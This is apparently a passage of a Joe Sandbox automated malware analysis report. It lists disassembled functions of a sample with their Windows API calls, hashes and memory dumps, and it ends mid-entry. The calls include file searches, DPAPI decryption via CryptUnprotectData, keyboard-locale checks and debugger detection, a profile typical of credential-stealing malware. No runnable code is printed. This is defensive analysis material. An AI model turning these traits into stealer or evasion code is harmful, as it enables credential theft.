                                                            • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                            • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                            • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                            • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                            Function 022DEF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 022DEFA5
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022DEFBC
                                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 022DF012
                                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 022DF028
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DF515
                                                            • FindClose.KERNEL32(000000FF), ref: 022DF52A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID:
                                                            • API String ID: 180737720-0
                                                            • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                            • Instruction ID: 8e03b5e54436ad303fc0043610b15a5ff9937c8a3b00a2ba99d05578d2f60643
                                                            • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                            • Instruction Fuzzy Hash: A8E1DC729213189ADF58EBA4DD91EEE733AAF64300F8041DDA10B62195EF346BC9DF50
                                                            Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                            • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                            • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                            • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                            • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                            Function 022DDCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022DDD52
                                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 022DDD9A
                                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 022DDDB0
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE033
                                                            • FindClose.KERNEL32(000000FF), ref: 022DE045
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                            • Instruction ID: 9941f445295ef5382ed7860858ae350d260117f63b03bba7a040d7134d76ec0a
                                                            • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                            • Instruction Fuzzy Hash: 4F9171729203049BCF14FBF4DD959FD737AAB95300F404658E80B96298EF389B189F91
                                                            Function 022DF917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                                            • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                            • Instruction ID: f9fcf0aa570474f21502db070e27222cd3742d892e756a41d4cafcb42446bad5
                                                            • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                            • Instruction Fuzzy Hash: 69B13F719203189BCF24EFA4DD95EEE737AAF94300F808199E40B56698EF345B48DF91
                                                            Function 022D1937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022D1B8A
                                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 022D1BDA
                                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 022D1BF0
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022D1FA7
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022D2031
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022D2087
                                                            • FindClose.KERNEL32(000000FF), ref: 022D2099
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 1415058207-0
                                                            • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                            • Instruction ID: 73a9364c24afd51a29fb2c5b36399241a525cd4f94928fcb7a40d0c7100667f9
                                                            • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                            • Instruction Fuzzy Hash: 0512B971920318ABCF19EBA4DD95EFD737AAF64300F80419DA50B62198EF746B88DF50
                                                            Function 022DE077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022DE0C5
                                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 022DE115
                                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 022DE12B
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE647
                                                            • FindClose.KERNEL32(000000FF), ref: 022DE659
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2325840235-0
                                                            • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                            • Instruction ID: 440464842bfea9bd3f8c3077bc53d2126ae183129c8bf3bfc03003d384b37090
                                                            • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                            • Instruction Fuzzy Hash: D5F18E719243189ACF19EBA4DD95EEE733ABF64300F8051DEA04B62194EF346F89DE50
                                                            Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                            • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                            • String ID: /
                                                            • API String ID: 3090951853-4001269591
                                                            • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                            • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                            • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                            • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                            Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C853
                                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008761F0), ref: 0040C871
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                            • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                            • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1498829745-0
                                                            • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                            • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                            • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                            • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                            Function 022DCA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022DCABA
                                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                                            • memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                                            • lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                                            • lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                                            • lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1498829745-0
                                                            • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                            • Instruction ID: 7124607a6af9e312d62fabed20a90f864ab73880f9c43b6cd4e3b9e6036be3fd
                                                            • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                            • Instruction Fuzzy Hash: 9441807895421AEFDB10DFE0DC88BFEBBB9BB44304F1045A9E509A6284D7749B84CF91
                                                            Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                            • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                            • String ID: N@
                                                            • API String ID: 4291131564-4229412743
                                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                            Function 022E7DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022E7E48
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022E7E60
                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 022E7E74
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022E7EC9
                                                            • LocalFree.KERNEL32(00000000), ref: 022E7F89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                            • String ID:
                                                            • API String ID: 3090951853-0
                                                            • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                            • Instruction ID: 7b36b7044187fc5517709c669f925f6071b0808c46861aa294c5174f1270752c
                                                            • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                            • Instruction Fuzzy Hash: 2F414B71960218ABDF24DF94DC89BEDB3B5FB54700F5041D9E00AA6294DB742F85CFA1
                                                            Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                            Function 022EB5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 022EBE09
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022EBE1E
                                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022EBE29
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 022EBE45
                                                            • TerminateProcess.KERNEL32(00000000), ref: 022EBE4C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction ID: 448d301f87af9d0852dfd6569630a4753f537efff7dbbb595473ce5d966f2ee6
                                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction Fuzzy Hash: 8F21A0BC910305DFDB14DF69F8896963BE4FB0A314F50403AE90A872A4EBB05985EF49
                                                            Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                            • String ID:
                                                            • API String ID: 3657800372-0
                                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                            Function 022D74A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022D74B4
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D74BB
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022D74E8
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022D750B
                                                            • LocalFree.KERNEL32(?), ref: 022D7515
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                            • String ID:
                                                            • API String ID: 2609814428-0
                                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction ID: 03cadf98fc03014be5a8b63e80c28f79453de4ce1e4a8b84e0aa660d07293381
